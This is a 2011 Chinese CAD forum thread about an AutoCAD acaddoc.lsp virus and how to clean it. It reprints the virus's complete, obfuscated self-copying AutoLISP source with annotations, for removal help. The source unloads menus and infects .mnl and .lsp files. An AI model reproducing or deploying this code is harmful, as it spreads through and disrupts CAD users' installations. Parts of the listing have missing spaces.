求史上最强的CAD病毒acaddoc.lsp专杀方法
本帖最后由 cumtjh 于 2011-3-17 14:52 编辑求CAD病毒acaddoc.lsp专杀
非常不幸,我的CAD中毒了,原因不详
CAD中病毒 ,特征如下:
1、打开一个CAD文件,目录下相应产生一个acaddoc.lsp文件
2、关键影响菜单加载。定义加载的菜单文件在CAD启动后加载又被立即卸载,所以菜单文件无法加载。
本人通过一些专杀以及完全卸载(删除目录),重新安装CAD都没有作用,病毒依旧存在,而且是2004 2006 2008经重新安装同时感染。
麻烦群里的高手给我想想办法,找到问题症结,我担心的是系统格式化病毒依旧存在
手动加载了,菜单显示有
但一点关闭按钮,菜单自动消失
AUTOCAD启动后命令行提示如下:
命令: menuload
无效或重复的别名: TB_JBCS (存在于工具栏: 常用工具 中)。
加载自定义文件成功。自定义组: MCAD
命令:
MineCAD 菜单实用程序
已成功地卸载自定义文件。自定义组: MCAD
文件目录下产生的acaddoc.lsp病毒文件中的内容如下:
; Contents of the acaddoc.lsp file that the virus creates in the drawing's directory:
;
; Analyst summary: AutoCAD loads a file named acaddoc.lsp automatically for each
; drawing it opens, so everything below runs without user action once such a file
; sits on the search path or next to a drawing.
;
; Clears any S::STARTUP function defined so far. The text of this line is also the
; marker the rest of the script searches for: it marks where the copied payload
; begins and whether a file has already been modified.
(setq s::startup nil)
; *startup* is assembled from character codes and decodes to the string
; "(setq s::startup nil)", i.e. the text of the line above. Building it with (chr ...)
; presumably keeps the literal marker from appearing a second time in the file, so
; that a line-by-line comparison matches only the first payload line.
(setq *startup*(strcat(chr 40)
(chr 115)
(chr 101)
(chr 116)
(chr 113)
(chr 32)
(chr 115)
(chr 58)
(chr 58)
(chr 115)
(chr 116)
(chr 97)
(chr 114)
(chr 116)
(chr 117)
(chr 112)
(chr 32)
(chr 110)
(chr 105)
(chr 108)
(chr 41)
)
)
; Resets the cache used by vlex-acadobject below.
(setq *acad-object* nil)
; vlex-file-attribute: tests whether FILENAME can be modified by deleting it and
; putting it back.
;   filename - file to test (resolved through findfile for the copy steps).
;   Returns T when the delete succeeded (the file is then restored from a temporary
;   copy), nil otherwise.
; The result variable fileatt is not in the local list, so it is left behind as a
; global. The temporary copy is "<directory of acad.exe>\tmp.txt"; a stray tmp.txt
; in the AutoCAD program directory is therefore a possible trace of this script.
; NOTE(review): `setqtmpname(` is printed without spaces in this copy, presumably
; lost in page extraction; treat the listing as an approximate transcript, not a
; byte-exact sample.
(defun vlex-file-attribute (filename / filenamenew tmpname)
(setq fileatt nil)
(setq filenamenew (findfile filename))
; (chr 97)...(chr 101) decodes to "acad.exe"; (chr 92)...(chr 116) to "\tmp.txt".
(setqtmpname(strcat(vl-filename-directory
(findfile (strcat (chr 97)
(chr 99)
(chr 97)
(chr 100)
(chr 46)
(chr 101)
(chr 120)
(chr 101)
)
)
)
(strcat(chr 92)
(chr 116)
(chr 109)
(chr 112)
(chr 46)
(chr 116)
(chr 120)
(chr 116)
)
)
)
; Keep a copy before attempting the delete so the original can be put back.
(vl-file-copy (findfile filename) tmpname)
(if (vl-file-delete filename)
(progn
; Delete worked: report success and restore the file at its resolved path.
(setq fileatt T)
(vl-file-copy tmpname filenamenew)
(vl-file-delete tmpname)
)
(progn
; Delete failed: report failure and discard the temporary copy.
(setq fileatt nil)
(vl-file-delete tmpname)
)
)
fileatt
)
; vlex-to-file: writes the lines in STRLIST into FILEPATH unless the file already
; contains the marker line held in *startup*.
;   filepath - target file; resolved with findfile when it exists.
;   strlist  - list of text lines to write.
; Behaviour visible here:
;   * file exists and no line equals *startup*  -> lines are appended, provided
;     vlex-file-attribute reports the file as modifiable;
;   * file exists and a line equals *startup*   -> file is left untouched;
;   * file does not exist                       -> it is created and filled.
; For cleanup this means a modified file can be recognised by a line reading exactly
; "(setq s::startup nil)", with the added content running from that line onward.
; txtstr and wjjh are not in the local list and so become globals.
(defun vlex-to-file (filepath strlist / wjh extstr tetstr wjhh)
(if (findfile filepath)
(progn
; tetstr stays T only while no marker line has been seen.
(setq tetstr T)
; (chr 114) is "r": open for reading.
(setq wjh (open (findfile filepath) (chr 114)))
(while (setq txtstr (read-line wjh))
(if (= txtstr *startup*)
(setq tetstr nil)
)
)
(close wjh)
(if tetstr
(progn
(if (vlex-file-attribute filepath)
(progn
; (chr 97) is "a": open for appending. A carriage-return line is written first,
; then the supplied lines.
(setq wjhh (open (findfile filepath) (chr 97)))
(write-line (chr 13) wjhh)
(foreach n strlist
(write-line n wjhh)
)
(close wjhh)
)
)
)
)
)
(progn
; (chr 119) is "w": the file did not resolve, so it is created.
(setq wjjh (open filepath (chr 119)))
(foreach n strlist
(write-line n wjjh)
)
(close wjjh)
)
)
)
; vlex-file-strlist: reads FILENPATH and returns its lines from the first line equal
; to TEXT through the end of the file.
;   filenpath - file to read.
;   text      - line that marks where collection starts (the matching line itself is
;               included, because the flag is set before the append test).
;   Returns a list of strings, or nil when no line equals TEXT.
; NOTE(review): `(iftep` is printed without a space in this copy, presumably lost in
; page extraction.
(defun vlex-file-strlist (filenpath text / wjh srlst tmp tep)
(setq srlst nil)
; (chr 114) is "r": open for reading.
(setq wjh (open filenpath (chr 114)))
(while (setq tmp (read-line wjh))
(if(= tmp text)
(setq tep T)
)
(iftep
(setq srlst (append srlst (list tmp)))
)
)
(if wjh
(close wjh)
)
srlst
)
; vlex-string-listall: splits STR at each occurrence of DELIMITER.
;   str       - string to split; nil yields nil.
;   delimiter - separator; the (+ post 2) step skips exactly one character, so a
;               single-character delimiter is assumed.
;   Returns the list of pieces with empty strings removed.
(defun vlex-string-listall (str delimiter / post strlst)
(if str
(progn (setq strlst nil)
(while (vl-string-search delimiter str)
(setq post (vl-string-search delimiter str))
; Text before the delimiter becomes the next piece; the remainder is re-scanned.
(setq strlst (append strlst (list (substr str 1 post))))
(setq str (substr str (+ post 2)))
)
(vl-remove "" (append strlst (list str)))
)
)
)
; vlex-acadobject: returns the AutoCAD application object, fetching it with
; vlax-get-acad-object on first use and caching it in the global *acad-object*.
(defun vlex-acadobject ()
(cond(*acad-object*)
(T (setq *acad-object* (vlax-get-acad-object)))
)
)
; vlex-menugroups: returns the MenuGroups collection of the application object.
(defun vlex-menugroups () (vla-get-menugroups (vlex-acadobject)))
; vlex-menugroups-listall: returns the names of all loaded menu groups as a list of
; strings, in collection order (built in reverse with cons, then reversed).
(defun vlex-menugroups-listall (/ out)
(vlax-for each (vlex-menugroups)
(setq out (cons (vla-get-name each) out))
)
(reverse out)
)
; Menu-unload stage. This is the part that produces the symptom described in the
; post: every menu group except the one named ACAD is unloaded right after start-up.
;
; CMDECHO 0 stops commands issued through (command ...) from being echoed on the
; command line; it is not set back anywhere in this listing.
(setvar "cmdecho" 0)
; Loads the Visual LISP COM functions (vlax-*/vla-*) used by the helpers above.
(vl-load-com)
(setq menulist (vlex-menugroups-listall))
(foreach n menulist
; (chr 65)(chr 67)(chr 65)(chr 68) decodes to "ACAD"; strcase makes the comparison
; case-insensitive.
(if (/= (strcase n)
(strcat
(chr 65)
(chr 67)
(chr 65)
(chr 68)
)
)
; The command name decodes to "menuunload", applied to menu group n.
(command (strcat (chr 109)
(chr 101)
(chr 110)
(chr 117)
(chr 117)
(chr 110)
(chr 108)
(chr 111)
(chr 97)
(chr 100)
)
n
)
)
)
;;;
;;;=== General Utility Functions ===
;;;
; Builds the list of directories to scan: the value of the environment variable
; "ACAD" (decoded from the character codes) split at ";" (chr 59). AutoCAD keeps its
; support file search path in that variable, so custom menu directories outside the
; installation folder are included.
(setq filepath (vlex-string-listall
(getenv (strcat
(chr 65)
(chr 67)
(chr 65)
(chr 68)
)
)
(chr 59)
)
)
; Initialises the work lists used by the statements that follow.
(setq mnufilelist
nil
mnlfilelist
nil
lspfilelist
nil
filealllist
nil
strlist nil
dwgpath nil
)
; Collects menu-related files from every directory on the search path.
; First pass: pattern decodes to "*.mnl" (menu LISP files); the third argument 1
; restricts vl-directory-files to files. The entries are file names as returned by
; vl-directory-files, not full paths.
(foreach n filepath
(if (vl-directory-files
n
(strcat
(chr 42)
(chr 46)
(chr 109)
(chr 110)
(chr 108)
)
1
)
(setq mnlfilelist
(append mnlfilelist
(vl-directory-files
n
(strcat (chr 42)
(chr 46)
(chr 109)
(chr 110)
(chr 108)
)
1
)
)
)
)
)
; Second pass: same scan with the pattern "*.mnu" (menu source files).
(foreach n filepath
(if (vl-directory-files
n
(strcat
(chr 42)
(chr 46)
(chr 109)
(chr 110)
(chr 117)
)
1
)
(setq mnufilelist
(append mnufilelist
(vl-directory-files
n
(strcat (chr 42)
(chr 46)
(chr 109)
(chr 110)
(chr 117)
)
1
)
)
)
)
)
; Collects AutoLISP files from the AutoCAD installation.
; Step 1: all "*.lsp" in "<directory of acad.exe>\support".
(setq lspfilelist
(vl-directory-files
(strcat (vl-filename-directory
(findfile (strcat (chr 97)
(chr 99)
(chr 97)
(chr 100)
(chr 46)
(chr 101)
(chr 120)
(chr 101)
)
)
)
(strcat (chr 92)
(chr 115)
(chr 117)
(chr 112)
(chr 112)
(chr 111)
(chr 114)
(chr 116)
)
)
(strcat
(chr 42)
(chr 46)
(chr 108)
(chr 115)
(chr 112)
)
)
)
; Step 2: adds all "*.lsp" in the directory of acad.exe itself.
(setq lspfilelist
(append lspfilelist
(vl-directory-files
(vl-filename-directory
(findfile (strcat (chr 97)
(chr 99)
(chr 97)
(chr 100)
(chr 46)
(chr 101)
(chr 120)
(chr 101)
)
)
)
(strcat (chr 42)
(chr 46)
(chr 108)
(chr 115)
(chr 112)
)
)
)
)
; acadpath = "<directory of acad.exe>\support", used below as the fallback location.
(setq acadpath (strcat (vl-filename-directory
(findfile (strcat (chr 97)
(chr 99)
(chr 97)
(chr 100)
(chr 46)
(chr 101)
(chr 120)
(chr 101)
)
)
)
(strcat (chr 92)
(chr 115)
(chr 117)
(chr 112)
(chr 112)
(chr 111)
(chr 114)
(chr 116)
)
)
)
; Chooses where the acaddoc.lsp copy goes. The system variable name decodes to
; "dwgname" (the current drawing's file name). If that file can be resolved, its
; directory is used; otherwise the support directory in acadpath is used.
; NOTE(review): `(setqdwgpath(` is printed without spaces in this copy, presumably
; lost in page extraction.
(if (findfile (getvar (strcat (chr 100)
(chr 119)
(chr 103)
(chr 110)
(chr 97)
(chr 109)
(chr 101)
)
)
)
(setqdwgpath(vl-filename-directory
(findfile (getvar (strcat (chr 100)
(chr 119)
(chr 103)
(chr 110)
(chr 97)
(chr 109)
(chr 101)
)
)
)
)
)
(setq dwgpath acadpath)
)
; Appends "\acaddoc.lsp" (decoded), giving the full path of the file that shows up
; beside each opened drawing, as described at the top of the post.
(setq dwgpath (strcat dwgpath
(chr 92)
(chr 97)
(chr 99)
(chr 97)
(chr 100)
(chr 100)
(chr 111)
(chr 99)
(chr 46)
(chr 108)
(chr 115)
(chr 112)
)
)
; Copy stage. Cleanup scope that follows from these statements: the acaddoc.lsp
; beside each drawing, every .mnl found on the support search path (and the .mnl
; next to every .mnu), and the .lsp files in the AutoCAD program and support
; directories.
;
; Candidate files, in the order they are searched for an existing marker line.
(setq filealllist (append mnlfilelist lspfilelist (list dwgpath)))
(setq listnum (length filealllist))
(setq num 0)
; Looks for the first candidate that already contains the marker and takes the lines
; from the marker to the end of that file as the content to copy.
(while (< num listnum)
(setq filename (nth num filealllist))
(if (findfile filename)
(setq strlist (vlex-file-strlist (findfile filename) *startup*))
)
; Pushing num past listnum ends the loop as soon as content was found.
(if strlist
(setq num (1+ listnum))
)
(setq num (1+ num))
)
; Writes the collected lines to acaddoc.lsp in the chosen directory.
(vlex-to-file dwgpath strlist)
; For every .mnu found, targets the .mnl with the same base name in the same
; directory (extension decoded from the character codes).
; NOTE(review): `(setqmnlfile(` is printed without spaces in this copy, presumably
; lost in page extraction.
(foreach n mnufilelist
(setqmnlfile(strcat(vl-filename-directory (findfile n))
(chr 92)
(vl-filename-base (findfile n))
(chr 46)
(chr 109)
(chr 110)
(chr 108)
)
)
(vlex-to-file mnlfile strlist)
)
; Finally processes every candidate file; vlex-to-file skips those that already
; contain the marker line.
(foreach n filealllist
(vlex-to-file n strlist)
)
(princ)
;;;
;;; To restore the system variables.
;;;
; Despite the header, no earlier values are saved: each variable is simply forced to
; a fixed value when it differs.
(if (/= (getvar "sdi") 0)(setvar "sdi" 0))
; ACADLSPASDOC = 1 makes AutoCAD load acad.lsp into every drawing rather than only
; the first one opened. When checking an affected machine, compare this setting with
; what the site expects.
(if (/= (getvar "acadlspasdoc") 1)(setvar "acadlspasdoc" 1))
(if (/= (getvar "zoomfactor") 40)(setvar "zoomfactor" 40))
(if (/= (getvar "mbuttonpan") 1)(setvar "mbuttonpan" 1))
(if (/= (getvar "highlight") 1)(setvar "highlight" 1))
(if (/= (getvar "fillmode") 1)(setvar "fillmode" 1))
; The test reads "pickadd" but the setvar names "spickadd"; the mismatch is in the
; listing as posted.
(if (/= (getvar "pickadd") 1)(setvar "spickadd" 1))
(if (/= (getvar "pickauto") 1)(setvar "pickauto" 1))
(if (/= (getvar "pickfirst") 1)(setvar "pickfirst" 1))
(if (/= (getvar "filedia") 1)(setvar "filedia" 1))
(if (/= (getvar "blipmode") 0)(setvar "blipmode" 0))
; Repeats the "fillmode" line from above.
(if (/= (getvar "fillmode") 1)(setvar "fillmode" 1))
(if (/= (getvar "textfill") 1)(setvar "textfill" 1))
(princ)
兄弟们,帮帮我吧我的神啊,救救我吧 没法工作啦
没有看明白什么意思 到这里看看CAD病毒吧!可能对你有帮助!
http://u.115.com/folder/f43d1ca8bbd# 一般的杀软都行啊 superzhzh 发表于 2011-3-16 17:49 static/image/common/back.gif
一般的杀软都行啊
不行的今天早上在LISP群里 讨论都没解决 好像360就行吧。原来mse不能杀的,现在也可以了 本帖最后由 cumtjh 于 2011-6-30 23:51 编辑
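问题已经解决,感谢大家的帮忙。问题原因在于不单感染了acaddoc.lsp,还感染了自定义文件中的MNL文件;删除acaddoc.lsp和MNL文件即可(问题已经解决)。感谢明经的朋友。
(补充:从上面贴出的代码看,被写入的文件除图纸目录下的acaddoc.lsp外,还包括支持文件搜索路径各目录中的*.mnl(以及与*.mnu同名的.mnl)和AutoCAD安装目录及其support目录下的*.lsp;清理时应逐一检查这些文件中是否有内容为“(setq s::startup nil)”的一行,追加的内容从该行开始直到文件末尾。这些文件有的位于安装目录之外,这可能也是仅重装CAD无效的原因。)
你好,现在本人CAD也是感染了acaddoc病毒,能否麻烦你讲下mnl文件在哪?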
http://bbs.mjtd.com/xwb/images/bgimg/icon_logo.png 来自 傅花使者zz 的新浪微博 这个病毒困扰人啊,我的空间里面那个就是处理这个问题的,不妨试试,在我的机器上实验了,可以彻底解决了:
自制CAD病毒专杀
http://bbs.mjtd.com/forum.php?mod=viewthread&tid=85455&fromuid=246364
(出处: 明经CAD社区)